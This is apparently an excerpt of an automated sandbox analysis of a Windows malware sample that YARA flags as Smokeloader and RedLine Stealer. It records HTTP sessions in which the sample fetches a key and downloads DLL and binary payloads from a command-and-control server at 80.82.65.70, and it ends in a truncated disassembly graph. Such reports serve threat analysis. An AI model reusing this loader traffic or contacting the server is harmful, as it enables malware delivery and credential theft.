                                          Dec 13, 2024 08:36:35.769913912 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.769927979 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.769977093 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.770838022 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.770889044 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.770893097 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.770942926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.771642923 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.771657944 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.771688938 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.771709919 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.773739100 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.773788929 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.773880959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.773966074 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.774425983 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.774499893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.774574995 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.774626970 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.775204897 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.775250912 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.775402069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.775455952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.857868910 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.857887030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.857934952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.858269930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.858283043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.858325005 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.858963013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.859059095 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.859071970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.859124899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.859858036 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.859915018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.923074961 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.923141003 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.923154116 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.923183918 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.923440933 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.923475981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.923506021 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.923531055 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.924390078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.924424887 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.924473047 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.924489975 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.925335884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.925369978 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.925390959 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.925424099 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.926127911 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.926163912 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.926181078 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.926219940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.927153111 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.927187920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.927203894 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.927236080 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.927927017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.927963018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.928009987 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.928778887 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.928833961 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.928953886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.929014921 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.929686069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.929735899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.929811001 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.929873943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.930614948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.930649042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.930675983 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.930704117 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.931469917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.931586981 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.931611061 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.931658030 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.932518959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.932534933 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.932585001 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.933412075 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.933423042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.933465958 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.934098005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.934149027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.934185982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.934230089 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.935071945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.935082912 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.935123920 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.935132980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.935877085 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.935933113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.935956001 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.936001062 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.936853886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.936865091 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.936907053 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.937685013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.937742949 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.937777042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.937819958 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.938564062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.938615084 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.938658953 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.938869953 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.939440012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.939487934 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.939554930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.939620018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.940340042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.940401077 CET4977280192.168.2.480.82.65.70
                                          • 80.82.65.70
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.4 | 49736 | 80.82.65.70 | 80 | 7324 | C:\Users\user\Desktop\file.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 13, 2024 08:35:55.353899002 CET | 412 | OUT | GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:35:56.728916883 CET | 204 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:35:56 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:35:56.743645906 CET | 386 | OUT | GET /dll/key HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:35:57.217278957 CET | 224 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:35:56 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 21
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                          Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                          Dec 13, 2024 08:35:57.228630066 CET | 391 | OUT | GET /dll/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:35:57.802604914 CET | 1236 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:35:57 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                          Content-Length: 97296
                                          Keep-Alive: timeout=5, max=98
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Dec 13, 2024 08:35:58.417710066 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:35:58.905780077 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:35:58 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=97
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:00.943149090 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:01.433620930 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:01 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=96
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:03.459718943 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:03.980022907 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:03 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=95
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:06.007148981 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:06.491027117 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:06 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=94
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:08.521539927 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:09.011677027 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:08 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=93
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:11.037185907 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:11.525727034 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:11 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=92
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:13.553316116 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:14.085191011 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:13 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=91
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:16.115699053 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:16.612184048 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:16 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=90
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:18.647279024 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:19.137053967 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:18 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=89
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          1 | 192.168.2.4 | 49744 | 80.82.65.70 | 80 | 7324 | C:\Users\user\Desktop\file.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 13, 2024 08:36:21.283587933 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:22.623142004 CET | 204 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:22 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          2 | 192.168.2.4 | 49755 | 80.82.65.70 | 80 | 7324 | C:\Users\user\Desktop\file.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 13, 2024 08:36:24.768309116 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:26.105125904 CET | 204 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:25 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          3 | 192.168.2.4 | 49766 | 80.82.65.70 | 80 | 7324 | C:\Users\user\Desktop\file.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 13, 2024 08:36:29.301923037 CET | 392 | OUT | GET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: d
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:30.791419983 CET | 1236 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:30 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="dll";
                                          Content-Length: 242176
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          4 | 192.168.2.4 | 49772 | 80.82.65.70 | 80 | 7324 | C:\Users\user\Desktop\file.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 13, 2024 08:36:31.807749033 CET | 392 | OUT | GET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: s
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:33.419584990 CET | 1236 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:32 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="soft";
                                          Content-Length: 1502720
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream



                                          Target ID:0
                                          Start time:02:35:22
                                          Start date:13/12/2024
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0x400000
                                          File size:1'979'904 bytes
                                          MD5 hash:CFC94B958CBA743ED8B273401E37C465
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          Target ID:6
                                          Start time:02:36:35
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 580
                                          Imagebase:0x860000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:4%
                                            Dynamic/Decrypted Code Coverage:10.6%
                                            Signature Coverage:57.5%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:22
40373->40375 40374 4068a8 40383 402430 43 API calls 40374->40383 40384 402360 39 API calls 40375->40384 40378 406450 40376->40378 40380 4065fd 40377->40380 41877 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40378->41877 40382 406519 40379->40382 40394 402360 39 API calls 40380->40394 41884 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40382->41884 40387 4068bb 40383->40387 40388 40638b 40384->40388 40385 406459 40389 402360 39 API calls 40385->40389 40727 408260 40387->40727 40392 4063ac 40388->40392 40393 40638f 40388->40393 40395 406461 40389->40395 40390 406522 40396 402360 39 API calls 40390->40396 41871 407150 53 API calls 2 library calls 40392->41871 41870 4070d0 53 API calls 2 library calls 40393->41870 40400 406611 40394->40400 41878 4073e0 53 API calls 2 library calls 40395->41878 40402 40652a 40396->40402 40398 4068c6 40412 402430 43 API calls 40398->40412 40405 406693 40400->40405 40406 406615 40400->40406 41885 407700 53 API calls 2 library calls 40402->41885 40403 4063b1 40416 402430 43 API calls 40403->40416 40404 406394 40418 402430 43 API calls 40404->40418 41900 407c40 53 API calls 2 library calls 40405->41900 41894 407ab0 53 API calls 2 library calls 40406->41894 40407 406466 40415 402430 43 API calls 40407->40415 40409 40652f 40420 402430 43 API calls 40409->40420 40417 4068d9 40412->40417 40413 406698 40427 402430 43 API calls 40413->40427 40414 40661a 40424 402430 43 API calls 40414->40424 40419 406476 40415->40419 40421 4063c1 40416->40421 40737 408d60 40417->40737 40423 4063a4 40418->40423 40435 402360 39 API calls 40419->40435 40425 40653f 40420->40425 40437 402360 39 API calls 40421->40437 41919 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40423->41919 40429 40662a 40424->40429 41886 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40425->41886 40428 4066a8 40427->40428 40446 402360 39 API calls 40428->40446 41895 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40429->41895 40433 
